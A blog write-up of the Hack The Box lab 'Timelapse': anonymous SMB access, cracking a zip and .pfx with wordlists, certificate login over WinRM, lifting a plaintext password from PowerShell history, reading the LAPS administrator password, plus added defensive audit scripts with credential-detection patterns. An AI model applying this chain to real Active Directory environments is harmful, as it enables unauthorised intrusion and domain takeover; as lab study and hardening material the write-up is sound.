Hacker the Box Timelaps

Timelaps

Spawn the machine; its IP is 10.129.227.105.


Start with an nmap port scan.

nmap -A -sT -Pn 10.129.227.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 14:10 CST
Nmap scan report for bogon (10.129.227.105)
Host is up (0.41s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-26 14:11:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2023-12-26T14:12:04
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m55s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.11 seconds

Quite a few ports are open. The service banners show this is a Windows host, and DNS on 53, Kerberos on 88 and LDAP on 389 (advertising the domain timelapse.htb) mean it is a domain controller, DC01.

Anonymous (null-session) access to the Shares share works, so list its contents.

smbclient -N \\\\10.129.227.105\\Shares
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 23:39:15 2021
.. D 0 Mon Oct 25 23:39:15 2021
Dev D 0 Tue Oct 26 03:40:06 2021
HelpDesk D 0 Mon Oct 25 23:48:42 2021

6367231 blocks of size 4096. 1407914 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Tue Oct 26 03:40:06 2021
.. D 0 Tue Oct 26 03:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 23:46:42 2021

6367231 blocks of size 4096. 1410285 blocks available
smb: \Dev\> cd ../HeipDesk
cd \HeipDesk\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \Dev\> ls
. D 0 Tue Oct 26 03:40:06 2021
.. D 0 Tue Oct 26 03:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 23:46:42 2021

6367231 blocks of size 4096. 1411840 blocks available
smb: \Dev\> cd ../HelpDesk
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 23:48:42 2021
.. D 0 Mon Oct 25 23:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 22:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 22:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 22:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 22:57:44 2021

6367231 blocks of size 4096. 1414662 blocks available
smb: \HelpDesk\>

There is quite a bit here, so download everything first. The zip archive is password-protected; cracking it with a wordlist gives the password:

fcrackzip -D -p /home/kali/文档/rockyou.txt -u winrm_backup.zip


PASSWORD FOUND!!!!: pw == supremelegacy
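The whole foothold above comes from a share that anyone can read and that holds an archive, a certificate bundle and a private key protected only by dictionary passwords. The following script is an added example, not part of the original write-up: run on the file server, it lists non-administrative shares whose share-level ACL grants read access to broad principals and then searches those paths for file types that usually carry secrets. It assumes the SmbShare module (Windows Server 2012 and later); the principal and extension lists are my own choices and can be extended. Share-level ACLs are only one layer: whether a null session can actually list a share also depends on NTFS permissions and on the guest/anonymous access policy, so treat a hit as a lead to verify, not as proof of exposure.

```powershell
# Added example (not from the original write-up): find shares readable by
# broad principals and the secret-bearing files inside them.
# Assumes the SmbShare module; run elevated on the file server.

# Principals that make a share effectively public (share-level ACL names).
$broadPrincipals = @(
    'Everyone',
    'ANONYMOUS LOGON',
    'NT AUTHORITY\ANONYMOUS LOGON',
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users'
)

# File types that commonly contain credentials or key material.
$riskyExtensions = @('.zip', '.7z', '.rar', '.pfx', '.p12', '.pem', '.key',
                     '.kdbx', '.bak', '.config', '.xml', '.ps1', '.txt')

# Skip administrative shares (names ending in $) such as C$, ADMIN$ and IPC$.
$exposed = Get-SmbShare | Where-Object { $_.Name -notmatch '\$$' } | ForEach-Object {
    $share  = $_
    $grants = Get-SmbShareAccess -Name $share.Name |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $broadPrincipals -contains $_.AccountName }
    if ($grants) {
        [pscustomobject]@{
            Share     = $share.Name
            Path      = $share.Path
            GrantedTo = ($grants.AccountName -join ', ')
        }
    }
}

"Shares readable by broad principals:"
$exposed | Format-Table -AutoSize

# Walk each exposed share and report files that deserve a closer look.
$suspectFiles = foreach ($share in $exposed) {
    Get-ChildItem -Path $share.Path -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $riskyExtensions -contains $_.Extension.ToLower() } |
        Select-Object @{ n = 'Share'; e = { $share.Name } }, FullName, Length, LastWriteTime
}

"Secret-bearing file types inside those shares:"
$suspectFiles | Format-Table -AutoSize
```

A backup zip or a .pfx found this way should be moved off the share and the key it contains treated as compromised, since an offline dictionary attack against a PKCS#12 password, as the write-up shows, takes seconds.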

The archive contains a .pfx file that is itself password-protected. Crack it with john (pfx.john is the hash extracted from the .pfx), which gives the password thuglegacy:

john pfx.john --wordlist=/home/kali/文档/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:07 DONE (2023-12-26 15:25) 0.1328g/s 429726p/s 429726c/s 429726C/s thyriana..thomasfern
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now export the private key and certificate from the .pfx:

openssl pkcs12 -in legacyy_dev_auth.pfx -nodes -out server.pem
openssl rsa -in server.pem -out server.key
openssl x509 -in server.pem -out server.crt

Log in with evil-winrm -c server.crt -k server.key -i 10.129.227.105 -S (certificate authentication over WinRM HTTPS) and find user.txt in the user's directory.
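The login above needs no password at all: WinRM over HTTPS accepts a client certificate and maps it to an account. On a host you administer, the mappings that make this possible are visible in the WSMan provider. The script below is an added example, not from the original write-up; it reports whether certificate authentication is enabled for the WinRM service and which certificate subject/issuer pairs map to which user names, so a leaked .pfx can be tied to the account it unlocks and the mapping disabled while the certificate is revoked. It assumes it runs elevated on the WinRM server and uses only the standard WSMan: drive paths.

```powershell
# Added example (not from the original write-up): audit WinRM certificate
# authentication and client-certificate-to-account mappings on this host.
# Assumes an elevated session; paths are the standard WSMan: provider layout.

# Is the service willing to accept client certificates at all?
$certAuth = Get-Item -Path 'WSMan:\localhost\Service\Auth\Certificate'
"WinRM certificate authentication enabled: $($certAuth.Value)"

# Each mapping is a container whose leaf items are Subject, Issuer, URI, UserName, Enabled.
$mappings = Get-ChildItem -Path 'WSMan:\localhost\ClientCertificate' -ErrorAction SilentlyContinue

$report = foreach ($mapping in $mappings) {
    $props = @{}
    Get-ChildItem -Path $mapping.PSPath | ForEach-Object { $props[$_.Name] = $_.Value }
    [pscustomobject]@{
        Mapping  = $mapping.Name
        Subject  = $props['Subject']
        Issuer   = $props['Issuer']
        URI      = $props['URI']
        UserName = $props['UserName']
        Enabled  = $props['Enabled']
    }
}

if ($report) {
    "Client certificate mappings:"
    $report | Format-Table -AutoSize
} else {
    "No client certificate mappings are configured."
}

# Listener check: certificate auth only matters on an HTTPS listener, so show which exist.
Get-ChildItem -Path 'WSMan:\localhost\Listener' |
    ForEach-Object {
        $l = @{}
        Get-ChildItem -Path $_.PSPath | ForEach-Object { $l[$_.Name] = $_.Value }
        [pscustomobject]@{ Listener = $_.Name; Transport = $l['Transport']; Port = $l['Port']; Hostname = $l['Hostname'] }
    } | Format-Table -AutoSize
```

If a mapping points at an account whose certificate has left the estate, setting that mapping's Enabled leaf to false (Set-Item on the same WSMan: path) cuts off the certificate immediately, independent of CRL propagation.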

Privilege escalation

Read the PowerShell command history of the current user; it contains the credentials of another account, svc_deploy, which can be used to log in:

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
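The history file above is the crux of the escalation: an administrator built a PSCredential interactively with ConvertTo-SecureString -AsPlainText, and PSReadLine recorded the plaintext password to disk in a file any session of that user can read. The script below is an added example, not from the original write-up. It scans every profile's PSReadLine history on a host for commands that embed credentials, prints the hits with quoted strings and password arguments redacted, and ends with a hardening option for older PSReadLine versions. It assumes an elevated session so all profiles are readable; the history path is the standard one that the write-up itself reads, and the patterns are my own and will need tuning for local conventions.

```powershell
# Added example (not from the original write-up): find plaintext credentials
# left in PSReadLine history files across all profiles on a host.
# Assumes an elevated session; history location is the PSReadLine default.

# Each pattern is matched case-insensitively (PowerShell -match default).
$patterns = [ordered]@{
    'SecureString built from plaintext' = 'ConvertTo-SecureString.*-AsPlainText'
    'PSCredential constructed inline'   = 'PSCredential\s*\('
    'Password passed as an argument'    = '(?:^|\s)(?:-(?:p|pass|password)\s+\S+|/p(?:ass)?:\S+)'
    'net user with a password'          = '\bnet\s+user\s+\S+\s+\S+'
}

function Hide-Secret {
    # Keep the command's shape but blank quoted strings and the value after -p/-password,
    # so the report itself does not become a second copy of the secret.
    param([string]$Line)
    $Line -replace "'[^']*'", "'<redacted>'" `
          -replace '"[^"]*"', '"<redacted>"' `
          -replace '(?<=(?:^|\s)-(?:p|pass|password)\s+)\S+', '<redacted>'
}

# ConsoleHost_history.txt plus histories of other hosts (ISE, VS Code).
$historyFiles = Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\*_history.txt' `
                              -ErrorAction SilentlyContinue

$findings = foreach ($file in $historyFiles) {
    $lineNo = 0
    foreach ($line in (Get-Content -Path $file.FullName -ErrorAction SilentlyContinue)) {
        $lineNo++
        foreach ($name in $patterns.Keys) {
            if ($line -match $patterns[$name]) {
                [pscustomobject]@{
                    Profile = $file.FullName.Split('\')[2]   # C:\Users\<profile>\...
                    File    = $file.FullName
                    Line    = $lineNo
                    Finding = $name
                    Command = Hide-Secret $line
                }
                break   # one finding per line is enough
            }
        }
    }
}

"Credential-bearing history lines (secrets redacted):"
$findings | Format-Table -AutoSize

# Hardening for interactive sessions (put in the profile): do not record lines
# that look like they carry secrets. Newer PSReadLine releases ship a default
# handler that already skips lines containing words such as "password" or
# "asplaintext"; this explicit handler covers older builds and local patterns.
Set-PSReadLineOption -AddToHistoryHandler {
    param([string]$command)
    return ($command -notmatch 'AsPlainText|PSCredential|-Password|net\s+user')
}
```

Every hit should be followed by rotating the exposed password, not only by deleting the line: the history file has usually been readable for as long as the command has existed, as the svc_deploy credential here shows.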

Check the group membership of svc_deploy: the account belongs to LAPS_Readers.

whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448

Membership of LAPS_Readers grants read access to the LAPS-managed local administrator password stored in the ms-Mcs-AdmPwd attribute of computer objects. Read it for DC01; the password is %mrbV/o.7OYppk/5#n551gaF.

Get-ADComputer DC01 -property 'ms-mcs-admpwd'


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : %mrbV/o.7OYppk/5#n551gaF
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
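The final step works because a group that a low-privileged service account belongs to holds the right to read ms-Mcs-AdmPwd, and because the attribute is populated on the domain controller itself, where the "local" Administrator is the domain Administrator. The script below is an added example, not from the original write-up: it enumerates, for every OU, the ACEs that permit reading the legacy LAPS password attribute. Reading the attribute requires the CONTROL_ACCESS extended right on that specific attribute, or a blanket all-extended-rights or GenericAll entry on the container, so those are the entries collected. It assumes the ActiveDirectory module on a domain-joined host; if the LAPS management module is installed, Find-AdmPwdExtendedRights produces an equivalent listing. OU=Domain Controllers is an OU like any other and is therefore included.

```powershell
# Added example (not from the original write-up): list every principal that can
# read the legacy LAPS attribute ms-Mcs-AdmPwd on each OU of the domain.
# Assumes the ActiveDirectory module; run with an account that can read ACLs.

Import-Module ActiveDirectory

# Resolve the attribute's schema GUID, which is what attribute-scoped ACEs refer to.
$schemaNC  = (Get-ADRootDSE).schemaNamingContext
$attribute = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $attribute) { throw 'ms-Mcs-AdmPwd is not in the schema, so legacy LAPS is not deployed here.' }
$attrGuid = [guid]$attribute.schemaIDGUID

$extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$genericAll    = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

function Get-AdmPwdReadScope {
    # Returns why an ACE allows reading the attribute, or $null if it does not.
    param($Ace)
    if ($Ace.ActiveDirectoryRights.HasFlag($genericAll))        { return 'GenericAll' }
    if (-not $Ace.ActiveDirectoryRights.HasFlag($extendedRight)) { return $null }
    if ($Ace.ObjectType -eq $attrGuid)                           { return 'ms-Mcs-AdmPwd' }
    if ($Ace.ObjectType -eq [guid]::Empty)                       { return 'All extended rights' }
    return $null   # an extended right scoped to some other attribute or control access right
}

$readers = foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
    $acl = Get-Acl -Path ('AD:\' + $ou.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $scope = Get-AdmPwdReadScope $ace
        if ($scope) {
            [pscustomobject]@{
                OU        = $ou.DistinguishedName
                Principal = $ace.IdentityReference.Value
                Scope     = $scope
                Inherited = $ace.IsInherited
            }
        }
    }
}

"Principals able to read ms-Mcs-AdmPwd, per OU:"
$readers | Sort-Object OU, Principal | Format-Table -AutoSize

# Separately, flag domain controllers that carry the attribute at all: LAPS is meant
# for member machines, and on a DC the stored value is the domain Administrator's password.
Get-ADComputer -SearchBase (Get-ADDomain).DomainControllersContainer -Filter * -Properties ms-Mcs-AdmPwdExpirationTime |
    Where-Object { $_.'ms-Mcs-AdmPwdExpirationTime' } |
    Select-Object Name, DistinguishedName
```

Two things to look for in the output: a reader group on an OU that contains tier-0 machines, as LAPS_Readers on Domain Controllers is here, and any group whose membership is broader than the help-desk staff who actually need the passwords. The second query deliberately reads only the expiration timestamp, not the password, so the audit itself never touches the secret.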

Switch to the administrator account with evil-winrm -i 10.129.227.105 -u administrator -p '%mrbV/o.7OYppk/5#n551gaF' -S.

The administrator's Desktop is empty; under the Users directory there is a TRX directory, and root.txt is inside it.



Hacker the Box Timelaps
https://www.mrdang.icu/2024/03/28/Hacker-the-Box-Timelaps/
Author
Mr.Dang
Published on
March 28, 2024
License